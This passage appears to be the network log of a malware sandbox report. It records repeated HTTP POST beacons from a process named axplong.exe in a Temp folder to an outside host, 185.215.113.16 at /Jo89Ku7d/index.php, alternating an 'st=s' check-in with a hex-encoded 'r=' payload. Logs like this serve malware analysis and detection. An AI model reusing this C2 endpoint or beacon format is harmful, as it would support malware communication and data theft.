                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:39 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0
                    Jul 26, 2024 21:03:40.763165951 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:39 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    59 | 192.168.2.7 | 49765 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:03:40.890784025 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:41.672030926 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:41 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    60 | 192.168.2.7 | 49766 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:03:42.085217953 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:42.810873032 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:42 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    61 | 192.168.2.7 | 49767 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:03:42.934361935 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:43.746501923 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:43 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    62 | 192.168.2.7 | 49768 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:03:43.755846977 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:44.513744116 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:44 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    63 | 192.168.2.7 | 49769 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:03:45.188499928 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:45.962135077 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:45 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    64 | 192.168.2.7 | 49770 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:03:45.981333971 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:46.764130116 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:46 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    65 | 192.168.2.7 | 49771 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:03:46.889712095 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:47.736777067 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:47 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:47.749592066 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:48.050040007 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:47 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    66 | 192.168.2.7 | 49772 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:03:48.612116098 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:49.350050926 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:49 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    67 | 192.168.2.7 | 49773 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:03:49.363379002 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:50.111913919 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:49 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    68 | 192.168.2.7 | 49774 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:03:50.234698057 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:51.013109922 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:50 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    69 | 192.168.2.7 | 49775 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:03:51.067388058 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:51.818286896 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:51 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    70 | 192.168.2.7 | 49776 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:03:52.275566101 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:53.046051025 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:52 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:53.049216032 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:53.313394070 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:53 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    71 | 192.168.2.7 | 49777 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:03:53.437141895 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:54.224699020 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:54 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    72 | 192.168.2.7 | 49778 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:03:54.652141094 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:55.673037052 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:55 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0
                    Jul 26, 2024 21:03:55.673719883 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:55 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    73 | 192.168.2.7 | 49779 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:03:55.807981014 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:56.588874102 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:56 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    74 | 192.168.2.7 | 49780 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:03:56.605664015 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:57.380116940 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:57 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    75 | 192.168.2.7 | 49781 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:03:57.505314112 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:58.283596039 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:58 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    76 | 192.168.2.7 | 49782 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:03:58.549084902 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:59.321396112 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:59 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    77 | 192.168.2.7 | 49783 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:03:59.433690071 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
